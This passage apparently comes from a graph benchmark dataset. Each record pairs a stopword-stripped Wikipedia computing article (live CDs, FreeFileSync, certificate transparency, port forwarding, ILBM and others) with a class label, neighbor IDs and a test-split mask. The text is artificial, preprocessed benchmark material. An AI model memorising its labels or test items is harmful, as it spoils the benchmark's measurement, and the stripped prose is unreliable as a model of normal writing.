disc adapted use medium storing distributing large amounts computer data data may also include application operating-system software sometimes packaged archived compressed formats later seen convenient useful boot computer directly compact disc often minimal working system install full system onto hard drive read-write optical discs either mass-produced read-only discs write-once discs used purpose first compact disc drives personal computers generally much slow run complex operating systems computers designed boot optical disc operating systems came distributed compact discs either boot floppy cd would boot specifically install onto hard drive world first oldest non-linux live cd fm towns os first released 1989 release macintosh system 7 1991 yggdrasil linux 1992 although early developers users distributions built top linux kernel could take advantage cheap optical disks rapidly declining prices cd drives personal computers linux distribution cds distros generally treated collection installation packages must first permanently installed hard disks target machine however case distributions built top linux kernel free operating system meeting resistance consumer market perceived difficulty effort risk involved installing additional partition hard disk parallel existing operating system installation term live cd coined typical pc ram large enough 52x speed cd drives cd burners widespread among pc owners finally became convenient practical boot kernel run x11 window manager gui applications directly cd without disturbing os hard disk new different situation linux operating systems updates/upgrades released quickly different distributions versions offered online especially users burning cds first linux-based 'live cd yggdrasil linux first released beta form 1992~1993 ceased production 1995 though practice functionality hampered due low throughput contemporary cd-rom drives demolinux released 1998 first linux distribution specially designed live cd linuxcare bootable business card first released 1999 first live cd focus system administration first distributed bootable business card form factor finnix first released 2000 oldest live cd still production knoppix debian-derived linux distribution released 2003 found popularity rescue disk system primary distribution right since 2003 popularity live cds increased substantially partly due linux live scripts remastersys made easy build customized live systems popular linux distributions include live cd variant cases also preferred installation medium live cds made many different uses designed demonstrate test drive particular operating system usually linux another free open source operating system software tested run particular single use without interfering system setup data system functioning normally due operating system software issues made available example data recovered machine active virus infection without virus process active causing damage virus removed defences removal bypassed although live cds load memory free optical drive uses loading data cd-rom still slower typical hard drive boot rarely default large live cd images smaller live cd images loading filesystem directly ram provide significant performance boost ram much faster hard drive uses less power experienced users operating system may also use live cd determine whether extent particular operating system version compatible particular hardware configuration certain peripherals way know beforehand computer peripheral work buying live cd used troubleshoot hardware especially hard drive fails generally recovery disc case problems live cds save user-created files windows partition usb drive network drive accessible media live backup cds create image drives back files without problems due open files inconsistent sets additional uses include several live cds dedicated specific type applications according requirements thematic user communities cds tailored needs applications subject including general knowledge tutorial specifications trial data topics covers sub topics e.g administration breaks firewall rescue security etc type live cds cases particular live dvd covers one topic packaging software appliance installable live cd live iso often beneficial single image run real hardware types virtual machines allows developers avoid complexities involved supporting multiple incompatible virtual machine images formats focus lowest common denominator instead typically booting machine live cd appliance either runs non-persistent demo mode installs user request available storage device files live cd iso image accessed microsoft windows disk image emulator daemon tools unix variants mounting loop device later versions windows i.e windows 8 later software available earlier versions allow iso mounted volume mounting live cd filesystem software live cd run directly without booting chrooting mounted filesystem live cd iso image also mounted virtual machine software virtualbox vmware workstation converted live usb using syslinux special tools automate process live cd initialization user typically may resort using one boot codes change booting behavior vary distribution distribution often accessed upon first boot screen one function keys live cds come installation utility launchable desktop icon optionally install system hard drive usb flash drive live cds access information internal and/or external hard drives diskettes usb flash drives live cds usually distributed read-only media requiring either copying rewriteable media i.e hard drive cd writer complete remastering install additional software however exceptions puppy linux recorded open multisession medium changes made use files created programs installed preferences customised written new session boot medium persisting subsequent boots term live cd came used cd containing operating system software could run without installation host computer operating systems used live include amigaos 4 amithlon aros freebsd freedos classic mac os macos microsoft windows installation repair discs os/2 reactos netbsd openbsd minix 3 plan 9 bell labs morphos opensolaris belenix others based solaris maintenance versions microsoft windows bootable cd bartpe windows pe microsoft diagnostics recovery toolset dart previously known emergency repair disk commander erd commander first personal computer operating system cd support live operations might amigaos could booted cd amiga cdtv 1990.. earlier examples live os course operating systems used floppy widely spread dos unlike previous operating systems optical media though linux os/2 live cds specifically designed run without installation onto media like hard disk drive live cd concept meant promote linux showcase abilities free open source operating system conventional personal computers microsoft windows already installed pc bootable compact disc generally conforms el torito specification introduced 1994 many linux based live cds use compressed filesystem image often cloop compressed loopback driver squashfs compressed filesystem generally doubling effective storage capacity although slowing application start resulting environment quite rich typical knoppix systems include around 1,200 separate software packages live cds reputation supporting advanced auto-configuration plug-and-play functionality came necessity avoid requiring user configure system time boots make easily usable new operating system read-only file system cd-rom drawback unable save current working data reason read-only file system often merged temporary writable file system form ram disk often default linux directories codice_1 containing users personal files configuration files codice_2 containing variable data kept ramdisk system updates frequently puppy linux live cds allow configuration added files written used later sessions modern live cds read-only file system merged ram drive using transparent techniques unionfs aufs ewf boot loaders like syslinux boot iso files usb memory devices live cds able detect use wide variety hardware including network cards graphic cards etc realtime often using facilities udev hotplug hal udisk etc.. common part distributions based linux kernel 2.6",
    "neighbors": [
      2560,
      3073,
      5120,
      6150,
      3079,
      6155,
      9740,
      2064,
      4113,
      8209,
      6675,
      7187,
      8725,
      8214,
      10776,
      25,
      4637,
      11297,
      9762,
      4643,
      6180,
      5158,
      551,
      7217,
      10803,
      9784,
      10809,
      4154,
      7739,
      8254,
      9791,
      576,
      2625,
      8772,
      5190,
      3147,
      6221,
      9806,
      9807,
      3160,
      89,
      10333,
      97,
      10851,
      11363,
      3685,
      9319,
      5736,
      6760,
      8298,
      9835,
      10856,
      10860,
      11368,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      11390,
      5247,
      7810,
      131,
      2179,
      2180,
      10883,
      10891,
      652,
      6797,
      10382,
      8847,
      10896,
      11410,
      9366,
      6296,
      2201,
      8857,
      9370,
      9882,
      7325,
      10394,
      9887,
      7840,
      9377,
      10920,
      9899,
      3245,
      8879,
      3248,
      178,
      9907,
      6837,
      2230,
      4790,
      9910,
      6329,
      8889,
      6333,
      5823,
      8388,
      1736,
      2248,
      9932,
      4815,
      5840,
      4309,
      7382,
      7385,
      1242,
      8410,
      9436,
      11481,
      1247,
      7905,
      11489,
      6371,
      1253,
      4841,
      6377,
      7403,
      6380,
      7913,
      242,
      3314,
      5363,
      6898,
      6393,
      9466,
      2811,
      9468,
      1278,
      10499,
      5895,
      1801,
      1804,
      273,
      8977,
      787,
      3859,
      789,
      278,
      5397,
      6934,
      8978,
      11539,
      6939,
      8992,
      10016,
      292,
      2853,
      6436,
      10235,
      2345,
      3369,
      5930,
      6445,
      7983,
      4401,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      8513,
      11075,
      11587,
      4421,
      4423,
      5452,
      6988,
      1358,
      10062,
      5457,
      11601,
      7507,
      4438,
      7511,
      2905,
      9562,
      7515,
      3420,
      2397,
      10590,
      8033,
      3426,
      10084,
      8551,
      5484,
      7020,
      370,
      11635,
      5492,
      2933,
      376,
      6012,
      8572,
      2430,
      7039,
      8063,
      8065,
      8573,
      7555,
      10113,
      8069,
      11135,
      11648,
      394,
      3978,
      4492,
      7057,
      11667,
      405,
      2967,
      11675,
      6044,
      8092,
      2462,
      5022,
      421,
      934,
      935,
      1445,
      4521,
      6055,
      9643,
      4525,
      11184,
      7601,
      8115,
      10676,
      8119,
      6075,
      8124,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      6092,
      9166,
      975,
      9689,
      5596,
      9693,
      8676,
      10730,
      10731,
      8687,
      6128,
      5105,
      3058,
      5618,
      5619,
      6641,
      5115,
      3068,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 1151,
    "label": 6,
    "text": "FreeFileSync:freefilesync freefilesync free open-source program used file synchronization available windows linux os x project backed donations donors get additional features auto-updater parallel sync portable version silent installation freefilesync works comparing one multiple folders content date file size subsequently synchronizing content according user-defined settings addition supporting local file systems network shares freefilesync able sync ftp ftps sftp mtp devices earlier versions packaged opencandy adware module many antivirus software vendors classify malware since release version 10.0 april 2018 software ad-free 13 november 2018 norton considers freefilesync installer malware blocks installation latest release compatible mac os x 10.7.5 freefilesync_8.4_mac_os_x https //freefilesync.org/archive.php cnet.com staff praised software quoting best software far business",
    "neighbors": [
      5380,
      2213,
      5356,
      6797,
      7983,
      823,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 1152,
    "label": 9,
    "text": "Global_variable:global variable computer programming global variable variable global scope meaning visible hence accessible throughout program unless shadowed set global variables known global environment global state compiled languages global variables generally static variables whose extent lifetime entire runtime program though interpreted languages including command-line interpreters global variables generally dynamically allocated declared since known ahead time languages variables global global default modern languages variables limited scope generally lexical scope though global variables often available declaring variable top level program languages however global variables exist generally modular programming languages enforce module structure class-based object-oriented programming languages enforce class structure interaction mechanisms global variables called global environment see also global state mechanisms global environment paradigm contrasted local environment paradigm variables local shared memory therefore interactions reconducted message passing global variables used extensively pass information sections code share caller/callee relation like concurrent threads signal handlers languages including c file defines implicit namespace eliminate problems seen languages global namespace though problems may persist without proper encapsulation without proper locking mutex code using global variables thread-safe except read values protected memory environment variables facility provided operating systems within os shell ksh unix bash linux command.com dos cmd.exe windows kind variable instance unix related systems ordinary variable becomes environment variable codice_1 keyword used program code shells access api calls codice_2 codice_3 local process set means open two terminal windows two different processes running shell change value environment variable one window change seen window child process created inherits environment variables values parent process usually program calls another program first creates child process forking child adjusts environment needed lastly child replaces program called child processes therefore use environment variables communicate peers avoiding action distance problem number non-structured languages early versions basic cobol fortran 1956 provide global variables fortran ii 1958 introduced subroutines local variables common keyword accessing global variables usage common fortan continued fortan 77 influenced later languages pl/sql named common groups globals behave somewhat like structured namespaces variables also global default forth lua perl shells c language codice_4 keyword however variables declared outside function file scope meaning visible within file variables declared file scope visible declaration end compilation unit codice_5 file unless shadowed like-named object nearer scope local variable implicitly external linkage thus visible codice_5 file compilation unit containing declarations also every compilation unit linked form complete program external linkage however sufficient variable use files compilation unit correctly access global variable need know type accomplished declaring variable file using codice_7 keyword declared file may defined one codice_7 declarations often placed shared header file since common practice .c files project include least one codice_9 file standard header file codice_10 example making codice_11 variable accessible modules project global access mechanism judged problematic disabled using codice_12 keyword restricts variable file scope cause attempts import codice_7 raise compilation linking error example global variable c variable external one need pass parameter use function besides main belongs every function module output languages like java n't global variables java variables local variables fields class hence variables scope either class method java static fields also known class variables exist independently instances class one copy shared among instances hence public static fields used many purposes global variables languages similar sharing behavior php codice_4 keyword number unusual ways using global variables variables declared outside functions file scope purposes widest scope however accessible inside functions unless imported codice_4 keyword i.e. keyword accesses global variables declare however predefined variables known superglobals always accessible arrays general purpose one codice_16 superglobal contains variables defined function scope changes elements change original variables additions create new variables superglobals codice_17 codice_18 widely used web programming",
    "neighbors": [
      2048,
      2817,
      386,
      8582,
      2062,
      655,
      3856,
      10510,
      3990,
      5783,
      9497,
      7325,
      7326,
      9245,
      10148,
      5029,
      7847,
      4777,
      11571,
      2102,
      823,
      6335,
      2627,
      5059,
      8644,
      5065,
      6349,
      335,
      9561,
      10075,
      8289,
      9700,
      7398,
      7933,
      8554,
      9454,
      4592,
      3313,
      5492,
      3960,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1153,
    "label": 3,
    "text": "Cloud_Master:cloud master chuka taisen horizontal scrolling shooter released arcade taito 1988 version sega master system later released cloud master pc engine version game titled famicom version titled chuuka taisen available us nintendo player controls mike chen floating cloud maneuvering around screen shooting balls energy flying enemies powerups collected stronger faster firepower parts game stage doors give player opportunity buy special bomb types collectible credits stage mini-boss big boss throughout stages player restarts certain checkpoints losing life 2008 starfish sd company founded former hot-b employees bought rights taito developed remake released nintendo wii title monkey king journey begins dubbed shin chuuka taisen michael meimei bouken japan",
    "neighbors": [
      10931
    ],
    "mask": "None"
  },
  {
    "node_id": 1154,
    "label": 5,
    "text": "Go-Back-N_ARQ:go-back-n arq go-back-n arq specific instance automatic repeat request arq protocol sending process continues send number frames specified window size even without receiving acknowledgement ack packet receiver special case general sliding window protocol transmit window size n receive window size 1 transmit n frames peer requiring ack receiver process keeps track sequence number next frame expects receive sends number every ack sends receiver discard frame exact sequence number expects either duplicate frame already acknowledged out-of-order frame expects receive later resend ack last correct in-order frame sender sent frames window detect frames since first lost frame outstanding go back sequence number last ack received receiver process fill window starting frame continue process go-back-n arq efficient use connection stop-and-wait arq since unlike waiting acknowledgement packet connection still utilized packets sent words time would otherwise spent waiting packets sent however method also results sending frames multiple times – frame lost damaged ack acknowledging lost damaged frame following frames window even received without error re-sent avoid selective repeat arq used examples assume infinite number sequence request numbers things keep mind choosing value n",
    "neighbors": [
      2752,
      5071,
      2640,
      4918,
      2203
    ],
    "mask": "Test"
  },
  {
    "node_id": 1155,
    "label": 4,
    "text": "Proof_of_secure_erasure:proof secure erasure computer security proof secure erasure pose proof erasure remote attestation protocol embedded device proves verifying party erased overwritten writable memory purpose make sure malware remains device typically new software installed device verifying party may called verifier device erased prover verifier must know device writable memory size trusted source device must allowed communicate parties execution protocol proceeds follows verifier constructs computational problem solved reasonable time using less specified amount memory sends device device responds solution verifier checks correctness simplest implementation verifier sends random message large device memory device expected store device received complete message required send back security approach obvious includes transfer huge amount data twice size device memory halved device responds hash message prevent device computing fly without actually storing message hash function parametrized random value sent device message avoiding huge data transfer requires suitable stated overview computational problem whose description short dziembowski et al achieve constructing call − δ ε -uncomputable hash function computed quadratic time using memory size memory size − δ computed negligible probability ε. karvelas kiayias claim designed first pose quasilinear time sublinear communication complexity proof space protocol similar proof secure erasure require prover dedicate specific amount memory convince verifier nevertheless important differences design considerations purpose proof space similar proof work verifier time complexity must small property may useful proof secure erasure well fundamental usefulness proof secure erasure hand requires prover unable convince verifier using less specified amount memory even may useful protocol however proof space harmed prover may succeed even significantly less space",
    "neighbors": [
      7515,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1156,
    "label": 1,
    "text": "U1DB:u1db u1db cross-platform cross-device syncable database application programming interface api allows applications store json documents synchronize machines devices u1db schemaless document-oriented database api need contain pre-defined list fields implemented language platform using data store backend u1db created canonical scaling issues couchdb previously used ubuntu one service problems implementing service millions users time providing good performance large server farms well tablets smart phones defining interface api allowed implement data synchronization service using different languages data stores platform",
    "neighbors": [
      9828,
      3462,
      10470,
      5546,
      8554,
      5677,
      5560,
      1435,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1157,
    "label": 4,
    "text": "Certificate_Transparency:certificate transparency certificate transparency ct internet security standard open source framework monitoring auditing digital certificates standard creates system public logs seek eventually record certificates issued publicly trusted certificate authorities allowing efficient identification mistakenly maliciously issued certificates 2011 reseller certificate authority comodo attacked certificate authority diginotar compromised calling attention existing flaws certificate authority ecosystem accelerating work various mechanisms prevent monitor unauthorized certificate issuance ben laurie adam langley emilia kasper began work open source framework combat issues year submitted first draft standard ietf internet draft 2012 code-name sunlight one problems digital certificate management fraudulent certificates take long time spotted reported revoked browser vendors certificate transparency would help making impossible certificate issued domain without domain owner knowing certificate transparency require side channel communication validate certificates competing technologies online certificate status protocol ocsp convergence certificate transparency also operates without need trust third party certificate transparency depends verifiable certificate transparency logs log appends new certificates ever-growing merkle hash tree seen behaving correctly log must log may accept certificates yet fully valid certificates expired monitors act clients log servers monitors check logs make sure behaving correctly inconsistency used prove log behaved correctly signatures log data structure merkle tree prevent log denying misbehavior auditors also act clients log servers certificate transparency auditors use partial information log verify log partial information google launched first certificate transparency log march 2013 september 2013 digicert became first certificate authority implement certificate transparency google chrome began requiring certificate transparency newly issued extended validation certificates 2015 began requiring certificate transparency certificates newly issued symantec june 1 2016 found issued 187 certificates without domain owners knowledge cloudflare announced ct named nimbus march 23 2018",
    "neighbors": [
      513,
      517,
      1288,
      9744,
      1683,
      1688,
      1946,
      9117,
      3742,
      2083,
      8358,
      8615,
      11693,
      11569,
      9394,
      7736,
      9281,
      9412,
      3657,
      5834,
      10831,
      11345,
      2003,
      5590,
      474,
      3805,
      7264,
      9569,
      8674,
      7139,
      3941,
      10341,
      5107,
      501,
      1526,
      2169,
      3707,
      8956,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 1158,
    "label": 3,
    "text": "Motorola_68451:motorola 68451 mc68451 motorola freescale memory management unit mmu primarily used conjunction motorola mc68010 microprocessor mc68451 supported 16mb address space provided mc68000 mc68010 support memory management protection memory unauthorized access block size variable usually used segment-based memory management supported mapping 96 memory segments pages variable size logical physical addresses allow segments pages simultaneous use 3 mc68451 mmus officially supported combination mc68010 mc68451 permitted realization virtual memory earlier mc68000 possible due design error way mc68000 treated memory access errors i.e processor state could always properly restored page fault limitation 96 segment table entries made systems based mc68010 mc68451 slow often modify segment table due small size companies e.g h. berthold ag therefore used 12 mc68451 mmus together others e.g sun microsystems used proprietary mmus instead mc68451 small massachusetts workstation company apollo computer used two 68000 processors running concurrently one running single instruction behind processor fault occurred cpus could switch places second cpu could take processing virtual memory page swapped",
    "neighbors": [
      7299,
      3844,
      4868,
      7302,
      10501,
      7305,
      3467,
      1548,
      6415,
      1809,
      11539,
      2073,
      7065,
      7709,
      8102,
      5297,
      11314,
      11447,
      8761,
      6715,
      1983,
      9665,
      10945,
      3017,
      4046,
      336,
      8530,
      3540,
      3932,
      3936,
      7269,
      9964,
      8048,
      3185,
      10224,
      5235,
      7286,
      3319,
      8058,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 1159,
    "label": 9,
    "text": "BBN_LISP:bbn lisp bbn lisp also stylized bbn-lisp dialect lisp programming language bolt beranek newman inc. cambridge massachusetts based l. peter deutsch implementation lisp pdp-1 called basic pdp-1 lisp developed 1960 1964 time language expanded became separate dialect 1966 bbn lisp notable predecessor interlisp",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      6840,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      8262,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      10981,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      5751,
      6906,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 1160,
    "label": 5,
    "text": "Wireless_Transport_Layer_Security:wireless transport layer security wireless transport layer security wtls security protocol part wireless application protocol wap stack sits wtp wdp layers wap communications stack wtls derived tls wtls uses similar semantics adapted low bandwidth mobile device main changes wtls superseded wap wireless application protocol 2.0 standard end-to-end transport layer security specification wtls uses modern cryptographic algorithms common tls allows negotiation cryptographic suites client server incomplete list mentioned client server negotiate cryptographic suite happens session started briefly client sends list supported algorithms server chooses suite refuses connection standard mandate support algorithm endpoint either client server needs interoperable endpoint may need implement every algorithm including covered intellectual property rights",
    "neighbors": [
      10656,
      1285,
      11240,
      479,
      5875,
      9367,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 1161,
    "label": 7,
    "text": "Data_farming:data farming data farming process using designed computational experiments “ grow ” data analyzed using statistical visualization techniques obtain insight complex systems methods applied computational model data farming differs data mining following metaphors indicate miners seek valuable nuggets ore buried earth control hard extract nuggets surroundings ... similarly data miners seek uncover valuable nuggets information buried within massive amounts data data-mining techniques use statistical graphical measures try identify interesting correlations clusters data set farmers cultivate land maximize yield manipulate environment advantage using irrigation pest control crop rotation fertilizer small-scale designed experiments let determine whether treatments effective similarly data farmers manipulate simulation models advantage using large-scale designed experimentation grow data models manner easily lets extract useful information ... results reveal root cause-and-effect relationships model input factors model responses addition rich graphical statistical views relationships nato modeling simulation task group documented data farming process final report msg-088 data farming uses collaborative processes combining rapid scenario prototyping simulation modeling design experiments high performance computing analysis visualization iterative loop-of-loops science design experiments doe around century pioneered r.a. fisher agricultural studies many classic experiment designs used simulation studies however computational experiments far fewer restrictions real-world experiments terms costs number factors time required ability replicate ability automate etc consequently framework specifically oriented toward large-scale simulation experiments warranted people conducting computational experiments long computers around term “ data farming ” recent coined 1998 conjunction marine corp ’ project albert small agent-based distillation models type stochastic simulation created capture specific military challenges models run thousands millions times maui high performance computer center facilities project albert analysts would work military subject matter experts refine models interpret results initially use brute-force full factorial gridded designs meant simulations needed run quickly studies required high-performance computing even small number factors limited number levels could investigated due curse dimensionality seed center data farming naval postgraduate school also worked closely project albert model generation output analysis creation new experimental designs better leverage computing capabilities maui facilities recent breakthroughs designs specifically developed data farming found among others series international data farming workshops held since 1998 seed center data farming international data farming workshop 1 occurred 1991 since 16 workshops taken place workshops seen diverse array representation participating countries canada singapore mexico turkey united states international data farming workshops operate collaboration various teams experts recent workshop held 2008 saw 100 teams participating teams data farmers assigned specific area study robotics homeland security disaster relief different forms data farming experimented utilized group pythagoras abm logistics battle command model agent-based sensor effector model absem",
    "neighbors": [
      2818,
      3880,
      522,
      6131,
      8085
    ],
    "mask": "None"
  },
  {
    "node_id": 1162,
    "label": 2,
    "text": "ILBM:ilbm interleaved bitmap ilbm image file format conforming interchange file format iff standard format originated amiga platform ibm-compatible systems files format related pbm planar bitmap format typically encountered games late 1980s early 1990s either amiga ports graphical assets designed amiga machines characteristic feature format stores bitmaps form interleaved bit planes gives format name reflects way amiga graphics hardware natively reads graphics data memory simple form compression supported make ilbm files compact amiga files associated particular file extension though started used pc systems extensions systematically used employed .lbm occasionally .bbm extension ilbm implementation iff file format consisting number consecutive chunks whose order extent varied chunk different function basic format means program read decode every chunk file ones wants deal ones understand ilbm files usually contain enough information allow displayed image editing program including image dimensions palette pixel data files designed act palettes paint programs pixel data left blank merged another image makes much flexible also much complex formats bmp ilbms bmhd chunk 'vital chunks must appear body chunk chunks appearing body considered 'extra many programs leave unread unchanged bmhd chunk specifies image displayed usually first chunk inside form defines image height/width drawn screen display various screen resolutions image compressed content chunk follows body chunk usually last chunk file largest ilbm files body chunk stores actual image data interleaved bitplanes optional mask row bitplanes appear first 1 n followed mask plane image uncompressed line made codice_1 16-bit values i.e one bit per pixel rounded nearest multiple 16-bits compressed line compressed individually always multiple 16-bits long compressed pbm files body chunk simpler uncompressed continuous stream bytes containing image data image compressed row data bitplane compressed individually including mask data present compression variety rle compression using flags decoded follows compression routine best encode 2 byte repeat run replicate run except preceded followed literal run case best merge three one literal run always encode 3 byte repeats replicate runs camg chunk specifically commodore amiga computer stores long viewport mode lets specify amiga display modes like dual playfield hold modify surprisingly rare outside amiga games need convert display files might contain meaningful camg chunks see 'notes working ilbm files cmap chunk contains image palette consists 3-byte rgb values colour used byte 0 255 inclusive chunk codice_2 bytes long number colours palette codice_3 chunk optional default palette used present possible fewer entries expected e.g 7 colours 4-plane '16 colour bitmap example remember odd number colours per iff specification chunk padded one byte make even number bytes long pad byte included chunk length field colour range chunk 'nonstandard used electronic arts deluxe paint program identify contiguous range colour registers shade range colour cycling zero crng chunks ilbm file appear body chunk deluxe paint normally writes 4 crng chunks ilbm user asks save picture commodore graphicraft program uses ccrt colour cycling range timing chunk contains cycleinfo structure like crng nonstandard chunk data similar crng chunk program would probably use one two methods expressing colour cycle data could write want communicate information deluxepaint graphicraft optional property dest way control scatter zero source bitplanes deeper destination image readers may ignore dest low order depth number bits planepick planeonoff planemask correspond one-to-one destination bitplanes bit 0 bitplane 0 etc higher order bits ignored 1 bits planepick mean put next source bitplane bitplane number 1 bits equal numplanes 0 bits mean put corresponding bit planeonoff bitplane bits planemask gate writing destination bitplane 1 bits mean write bitplane 0 bits mean leave bitplane alone normal case dest chunk equivalent codice_4 remember color numbers formed pixels destination bitmap depth planes deep source bitmap numplanes planes deep optional grab chunk locates handle hotspot image relative upper left corner e.g. used mouse cursor paint brush optional sprt chunk indicates image intended sprite thus mask plane transparent colour n't fullscreen handled depends program using image data stored sprite order used many programs place sprite foreground sprite order 1 appears behind one order 0 etc optional tiny chunk contains small preview image various graphics programs including deluxe paint compressed similar format body chunk sometimes ilbm file contains colour map image data often used store palette colours applied image separately case body chunk empty numplanes field bmhd chunk 0 ilbm files contain 'true-colour information rather indexed colours so-called 'deep images files cmap chunk usually 24 32 bitplanes standard ordering bitplanes put least significant bit red component first r0 r1 r2 r3 r4 r5 r6 r7 g0 g1 g2 g3 g4 g5 g6 g7 b0 b1 b2 b3 b4 b5 b6 b7 32 bit planes last 8 bit planes alpha channel r0 r1 ... r7 g0 ... g7 b0 ... b6 b7 a0 a1 a2 a3 a4 a5 a6 a7 image containing colour map 8 bitplanes may greyscale image i0 i1 i2 i3 i4 i5 i6 i7 ilbm file contains camg chunk bit 7 set i.e 0x80 hexadecimal file expects make use ehb extra half-brite mode amiga chipset colour map 32 entries image 6 bitplanes significant bitplane regarded flag unset use lower 5 bits index colour map usual flag set use lower 5 bits index colour map actual colour used half bright achieved shifted rgb components colour one bit right alternatively create colour map 64 entries copy lower 32 entries upper half converting half brightness use 6 bitplanes colour index pbm images exist extra half-brite mode ilbm file contains camg chunk bit 11 set i.e 0x800 hexadecimal file expects make use ham hold-and-modify mode amiga chipset ham6 format colour map 16 entries image 6 possibly 5 bitplanes ham8 format colour map 64 entries image 8 possibly 7 bitplanes last two bitplanes odd number bitplanes assume extra bitplane always 0 control flags indicate use first 4 6 bitplanes first pixel scanline modification pixel modify use image border colour note using 4 bits modify colour component use 4 bits upper 4 bits component lower 4 bits avoid reducing overall colour gamut using 6 bits less important still put 2 significant bits modification bits least significant two bits colour component pbm images exist hold modify mode utilities work ilbm bbm files rather dated macpaint deluxe paint irfanview allows viewing files free non commercial use work linux netpbm convert images ilbm ppm format back commander keen dreams series games compressed standalone ilbm images used title screens game read ilbm chunks images edited deluxepaint imported directly game files",
    "neighbors": [
      1347,
      6408,
      9100,
      432,
      6129,
      8627,
      8628
    ],
    "mask": "Test"
  },
  {
    "node_id": 1163,
    "label": 4,
    "text": "Phoenix_Labs:phoenix labs phoenix labs formerly methlabs software developing community founded tim leonard ken mcclelland best known peerguardian open-source software program optimized use personal firewall file sharing networks group originally organized work peerguardian program leonard created 2003 response shutdown audiogalaxy file sharing site name methlabs came leonard handle 'method late 2004 group added blocklist.org website designed allow users interactively manage block ip addresses certain organisations companies phoenix labs formed september 2005 following dispute members methlabs team according phoenix labs press release series threats incidents forced group methlabs.org website press release attributed action team member responsibility finances server control based information participants internet news sources identified person using nickname cerberius cerberius reportedly disputed charges domain hijacking described situation revolt method members group decided could get methlabs.com domain back decided took suggestions new name irc channel user named 'bizzyb0t came name phoenixlabs.org represent group reborn rising ashes peerguardian peerguardian 2 free open source programs developed capable blocking incoming outgoing connections based ip blocklists purpose block several organizations including riaa mpaa using file sharing networks fasttrack bittorrent system also advertising spyware government educational ranges depending upon user preferences programs developed phoenix labs xs file-sharing hub client deepdelete program erasing files securely make extremely difficult recover latter longer development",
    "neighbors": [
      11073,
      8753,
      1172,
      9496,
      10392
    ],
    "mask": "Test"
  },
  {
    "node_id": 1164,
    "label": 4,
    "text": "Port_forwarding:port forwarding computer networking port forwarding port mapping application network address translation nat redirects communication request one address port number combination another packets traversing network gateway router firewall technique commonly used make services host residing protected masqueraded internal network available hosts opposite side gateway external network remapping destination ip address port number communication internal host port forwarding allows remote computers example computers internet connect specific computer service within private local-area network lan typical residential network nodes obtain internet access dsl cable modem connected router network address translator nat/napt hosts private network connected ethernet switch communicate via wireless lan nat device external interface configured public ip address computers behind router hand invisible hosts internet communicate private ip address configuring port forwarding network administrator sets aside one port number gateway exclusive use communicating service private network located specific host external hosts must know port number address gateway communicate network-internal service often port numbers well-known internet services port number 80 web services http used port forwarding common internet services may implemented hosts within private networks typical applications include following administrators configure port forwarding gateway operating system linux kernels achieved packet filter rules iptables netfilter kernel components bsd macos operating systems prior yosemite os 10.10.x implement ipfirewall ipfw module macos operating systems beginning yosemite implement packet filter pf module used gateway devices port forward may implemented single rule translate destination address port linux kernels dnat rule source address port case left unchanged used machines default gateway network source address must changed address translating machine packets bypass translator connection fail port forward implemented proxy process application layer firewalls socks based firewalls via tcp circuit proxies packets actually translated data proxied usually results source address port number changed proxy machine.. usually one private hosts use specific forwarded port one time configuration sometimes possible differentiate access originating host source address unix-like operating systems sometimes use port forwarding port numbers smaller 1024 created software running root user running superuser privileges order bind port may security risk host therefore port forwarding used redirect low-numbered port another high-numbered port application software may execute common operating system user reduced privileges universal plug play protocol upnp provides feature automatically install instances port forwarding residential internet gateways upnp defines internet gateway device protocol igd network service internet gateway advertises presence private network via simple service discovery protocol ssdp application provides internet-based service may discover gateways use upnp igd protocol reserve port number gateway cause gateway forward packets listening socket port forwarding divided following specific types local remote dynamic port forwarding local port forwarding common type port forwarding used let user connect local computer another server i.e forward data securely another client application running computer secure shell ssh client using local port forwarding firewalls block certain web pages able bypassed connections ssh client forwarded via ssh server intended destination server ssh server configured redirect data specified port local host runs ssh client secure tunnel specified destination host port local port computer ssh client port forwarded port computer client wants connect destination host port configured connect forwarded port rather directly destination host port connection established ssh client listens forwarded port directs data sent applications port secure tunnel ssh server server decrypts data redirects destination host port command line “ -l ” specifies local port forwarding destination server two port numbers need included port numbers less 1024 greater 49150 reserved system programs work specific source ports part source port number used uses local port forwarding form port forwarding enables applications server side secure shell ssh connection access services residing ssh client side addition ssh proprietary tunnelling schemes utilize remote port forwarding general purpose words remote port forwarding lets users connect server side tunnel ssh another remote network service located tunnel client side use remote port forwarding address destination server tunnel client side two port numbers must known port numbers chosen depend application used remote port forwarding allows computers access applications hosted remote servers two examples dynamic port forwarding dpf on-demand method traversing firewall nat use firewall pinholes goal enable clients connect securely trusted server acts intermediary purpose sending/receiving data one many destination servers dpf implemented setting local application ssh socks proxy server used process data transmissions network internet programs web browsers must configured individually direct traffic proxy acts secure tunnel another server proxy longer needed programs must reconfigured original settings manual requirements dpf often used connection established dpf used provide additional security user connected untrusted network since data must pass secure tunnel another server forwarded original destination user protected packet sniffing may occur lan dpf powerful tool many uses example user connected internet coffee shop hotel otherwise minimally secure network may wish use dpf way protecting data dpf also used bypass firewalls restrict access outside websites corporate networks",
    "neighbors": [
      10631,
      9868,
      6541,
      8080,
      1814,
      5405,
      8998,
      6579,
      823,
      8386,
      7364,
      328,
      3150,
      6351,
      3792,
      7121,
      10341,
      9455,
      8308,
      5749,
      1273
    ],
    "mask": "None"
  },
  {
    "node_id": 1165,
    "label": 7,
